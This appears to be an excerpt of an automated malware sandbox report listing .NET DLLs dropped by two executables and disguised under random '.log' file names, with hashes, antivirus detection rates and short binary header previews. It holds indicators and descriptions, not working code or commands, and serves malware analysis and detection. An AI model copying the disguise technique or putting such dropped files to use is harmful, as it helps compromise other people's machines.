                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                    C:\Users\user\Desktop\GNRoGDmH.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28160
                                                                                                                                    Entropy (8bit):5.570953308352568
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\HScOGmcH.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.529329139831718
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\IhtNKAXm.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):33792
                                                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\JNNDResf.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\LionObPB.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):33792
                                                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\NEEtYbtY.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):85504
                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                    C:\Users\user\Desktop\NWsvAoLz.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32256
                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\QwkEqgro.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\UMwcyUfj.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22016
                                                                                                                                    Entropy (8bit):5.41854385721431
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\VRHDyDUj.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28160
                                                                                                                                    Entropy (8bit):5.570953308352568
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\WoNdSLwd.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\ZpKsdnCB.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22016
                                                                                                                                    Entropy (8bit):5.41854385721431
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\cnkBPSdA.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32256
                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\eSWSCFMK.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9728
                                                                                                                                    Entropy (8bit):5.0168086460579095
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                    MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                    SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                    SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                    SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                                    C:\Users\user\Desktop\ekLJkSsv.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):69632
                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                    C:\Users\user\Desktop\fAbTigaR.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.529329139831718
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\hSShNgSi.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28160
                                                                                                                                    Entropy (8bit):5.570953308352568
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

